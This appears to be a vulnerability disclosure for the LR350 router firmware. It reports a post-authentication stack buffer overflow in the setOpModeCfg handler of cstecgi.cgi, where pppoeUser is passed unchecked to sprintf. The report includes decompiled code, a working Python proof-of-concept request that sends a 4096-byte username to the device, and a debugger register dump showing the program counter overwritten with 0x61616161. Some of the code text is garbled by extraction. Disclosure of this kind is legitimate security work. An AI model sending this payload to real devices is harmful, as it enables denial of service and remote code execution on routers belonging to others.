LR350 - bof - setOpModeCfg

Hi, we found a post-authentication stack buffer overflow at LR350 (Firmware version V9.3.5u.6369_B20220309), and contact you at the first time.

In function **setOpModeCfg** of the file **/cgi-bin/cstecgi.cgi** , the size of **pppoeUser** is not checked, and directly copy to stack via **sprintf**

```
224 vl3 = websGetVar(a1, "pppoeUser", "");
225 nvram_set("wan_pppoe_username", v13);
226 v14 = websGetVar(a1, "pppoePass", "");

227 nvram_set("wan_pppoe_passwd", v14);

228 v15 = websGetVar(a1, "pppoeMtu", "1492");

229 nvram_set("wan_pppoe_mtu", v15);
230 v16 = websGetVar(a1, "pppoeServiceName", "");
231 nvram_set("wan_pppoe_service", v16);
232 v17 = websGetVar(a1, "pppoeAcName", "");
233 nvram_set("wan_pppoe_ac", v17);
234 v18 = atoi(v12);
235 if ( v18 )
236
237
        switch ( v18 )
238
239
           case 1:
             sprintf(v66, "\\n\\r%s", v13);
241
            nvram_set("wan_pppoe_username_mm", v66);
            break;
242
         case 2:
            sprintf(v66, "^^%s", v13);
            nvram_set("wan_pppoe_username_mm", v66);
245
246
            break;
247
         case 3:
```

PoC

```
import requests url = "http://192.168.17.220:80/cgi-bin/cstecgi.cgi" cookie =
{"Cookie":"uid=1234"} data = {'topicurl' : "setOpModeCfg", "proto" : "3",
"switchOpMode" : "1", "pppoeSpecType" : "2", "pppoeUser" : "a"*0x1000}
response = requests.post(url, cookies=cookie, json=data) print(response.text)
print(response)
```

```
T1
     0x0
 T2
     0x1
     0x77b6acab ← 0x706d7400
 T3
     0x80000000
 T4
     0x800
 T5
 T6
     0x81000000
 T7
     0x8
 T8
     0x8
     0x77b67058 ← lui
 T9
                      $gp, 2
     0x61616161 ('aaaa')
 S0
     0x61616161 ('aaaa')
 S1
     0x61616161 ('aaaa')
 S2
     0x61616161 ('aaaa')
 S3
     0x61616161 ('aaaa')
     0x61616161 ('aaaa')
 S6
     0x61616161 ('aaaa')
     0x61616161 ('aaaa')
 S7
 S8 0x61616161 ('aaaa')
     0x7f8785b0 ← 0x61616161 ('aaaa')
 FP
 SP <u>0x7f8785b0</u> ← 0x61616161 ('aaaa')
 PC 0x61616161 ('aaaa')
► f 0 61616161
```

The PC register can be hijacked, which means it can result in RCE.